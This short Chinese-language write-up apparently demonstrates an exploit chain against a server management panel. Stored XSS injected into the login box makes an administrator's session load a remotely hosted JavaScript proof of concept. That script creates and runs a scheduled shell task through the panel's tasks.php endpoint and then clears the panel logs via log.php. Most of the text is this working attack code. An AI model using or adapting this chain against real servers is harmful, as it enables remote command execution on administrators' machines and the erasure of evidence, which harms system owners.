登录框插入xss代码

模拟管理员登陆成功，xss代码被执行

然后，构造本地js POC文件

function test1() {
    $.get('/service/app/tasks.php?type=task_list',{},function(data) {
            var id = data.data[0].ID;
            $. post('/service/app/tasks.php?type-exec_task',{
                    tid:id
            },function(res){
                    $.post('/service/app/tasks.php?type=set_task_status', {
                            task_id: id,
                            status: 0
                    },function (res1){
                            $.post('/service/app/tasks.php?type=set_task_status',{
                                    task_id: id,
                                    status: 0
                            },function (res2){
                                    $.post("/service/app/log.php?type=clearlog",{
                                            type:"clearlog"
                                    },function(res3) {},"json");
                            },"json");
                    },"json");
            },"json");
    },"json");
}

function save() {
    var data = new Object(); 
    data.task_id =
    data.title ="test"
    data.exec_cycle ="5";
    data.week ="1" ;
    data.hour="1";
    data.minute="1"
    data.shell="echo 1 > D:/xp.cn/www/1.txt" ;
    $.post('/service/app/tasks.php?type=save_shell',data, function (res) {
    test1();
    },'json');
}
    save();

POC文件随便丢一个web容器，写入XSS

然后等待管理员正常登录会加载远程POC文件创建计划任务

等待一分钟，命令执行成功